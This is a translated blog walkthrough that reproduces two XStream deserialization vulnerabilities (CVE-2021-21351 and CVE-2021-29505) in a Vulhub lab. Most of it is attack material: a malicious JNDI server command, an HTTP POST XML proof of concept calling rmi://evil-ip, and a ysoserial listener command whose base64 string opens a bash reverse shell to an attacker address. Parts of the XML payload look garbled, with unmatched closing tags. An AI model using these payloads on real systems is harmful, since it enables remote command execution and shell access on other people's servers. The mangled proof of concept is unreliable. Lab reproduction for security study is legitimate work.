当前位置：网站首页>Vulhub vulnerability recurrence 75_ XStream

Vulhub vulnerability recurrence 75_ XStream

2022-07-06 00:58:00 【Revenge_ scan】

One 、 CVE-2021-21351_XStream Deserialization Command Execution Vulnerability

Preface

XStream It's a lightweight 、 Easy to use open source Java Class library , It's mainly used to sequence objects into XML（JSON） Or deserialize to an object .

Vulnerability Details

XStream In parsing XML The blacklist mechanism is used to prevent the deserialization vulnerability , But its 1.4.15 There are flaws in the blacklist and previous versions , Attackers can take advantage of `javax.naming.ldap.Rdn$RdnEntry` And `javax.sql.rowset.BaseRowSet` structure JNDI Inject , And then execute any command .

Reference link ：

- https://x-stream.github.io/CVE-2021-21351.html

- https://paper.seebug.org/1543/

- https://www.veracode.com/blog/research/exploiting-jndi-injections-java

- https://github.com/welk1n/JNDI-Injection-Exploit/

Vulnerability environment

shooting range ：192.168.4.10_ubuntu

attack :192.168.4.29_kali

Execute the following command to start a Springboot + XStream 1.4.15 Environment ：

#docker-compose up -d

After the environment starts , We ask `http://your-ip:8080` Send a normal XML Data packets , Will get the expected return ：

Loophole recurrence

Due to the target environment Java Version higher than 8u191, So we need help [ This article ](https://www.veracode.com/blog/research/exploiting-jndi-injections-java) The method given in , Use `org.apache.naming.factory.BeanFactory` Add EL Expression injection to execute arbitrary commands .

1. Use [ This tool ](https://github.com/welk1n/JNDI-Injection-Exploit/) Start malicious JNDI The server ：

```

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.1.142

```

2. Use the above figure based on SpringBoot Using chain RMI Address as `<dataSource>` Value , structure POC as follows ：

```

POST / HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: application/xml

Content-Length: 3184

<sorted-set>

<javax.naming.ldap.Rdn_-RdnEntry>

<type>ysomap</type>

<m__DTMXRTreeFrag>

<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>

<m__size>-10086</m__size>

<m__mgrDefault>

<__overrideDefaultParser>false</__overrideDefaultParser>

<m__incremental>false</m__incremental>

<m__source__location>false</m__source__location>

<m__dtms>

<null/>

</m__dtms>

<m__defaultHandler/>

</m__mgrDefault>

<m__shouldStripWS>false</m__shouldStripWS>

<m__indexing>false</m__indexing>

<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>

<javax.sql.rowset.BaseRowSet>

<showDeleted>false</showDeleted>

<dataSource>rmi://evil-ip:1099/example</dataSource>

</default>

</javax.sql.rowset.BaseRowSet>

<com.sun.rowset.JdbcRowSetImpl>

</com.sun.rowset.JdbcRowSetImpl>

</fPullParserConfig>

<class>com.sun.rowset.JdbcRowSetImpl</class>

<name>setAutoCommit</name>

<parameter-types>

<class>boolean</class>

</parameter-types>

</fConfigSetInput>

<fParseInProgress>false</fParseInProgress>

</m__incrementalSAXSource>

<m__walker>

<nextIsRaw>false</nextIsRaw>

</m__walker>

<m__endDocumentOccured>false</m__endDocumentOccured>

<m__idAttributes/>

<m__textPendingStart>-1</m__textPendingStart>

<m__useSourceLocationProperty>false</m__useSourceLocationProperty>

<m__pastFirstElement>false</m__pastFirstElement>

</m__dtm>

<m__dtmIdentity>1</m__dtmIdentity>

</m__DTMXRTreeFrag>

<m__dtmRoot>1</m__dtmRoot>

<m__allowRelease>false</m__allowRelease>

</value>

</javax.naming.ldap.Rdn_-RdnEntry>

<javax.naming.ldap.Rdn_-RdnEntry>

<type>ysomap</type>

<m__obj class='string'>test</m__obj>

</value>

</javax.naming.ldap.Rdn_-RdnEntry>

</sorted-set>

```

Particular attention ,evil-ip It's malice RMI（ Non post execution address , For the actual .jar Address , This time at 192.168.4.29_kali On the implementation , be rmi The address is 192.168.4.29） The address of the server . then , Enter the target container , so ``touch /tmp/success`` Has been successfully executed ：

In actual combat , If target Java Lower version ,POC It needs to be modified , Will be one of the `<__overrideDefaultParser>false</__overrideDefaultParser>` Change to `<__useServicesMechanism>false</__useServicesMechanism>` that will do .

Two 、 CVE-2021-29505_XStream Deserialization Command Execution Vulnerability

Vulnerability Details

XStream In parsing XML The blacklist mechanism is used to prevent the deserialization vulnerability , But its 1.4.16 There are flaws in the blacklist and previous versions , Attackers can take advantage of `sun.rmi.registry.RegistryImpl_Stub` structure RMI request , And then execute any command .

Reference link ：

- [https://x-stream.github.io/CVE-2021-29505.html][1]

- https://paper.seebug.org/1543/

Vulnerability environment

Execute the following command to start a Springboot + XStream 1.4.16 Environment ：

#docker-compose up -d

After the environment starts , We ask `http://your-ip:8080` Send a normal XML Data packets , Will get the expected return ：

Loophole recurrence

1. As an attacker , We use it on our own servers [ysoserial](https://github.com/frohoff/ysoserial) Of JRMPListener stay 4444 The port starts a malicious RMI Registry：

```

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMjkvOTk5OSAwPiYxCg==}|{base64,-d}|{bash,-i}"

```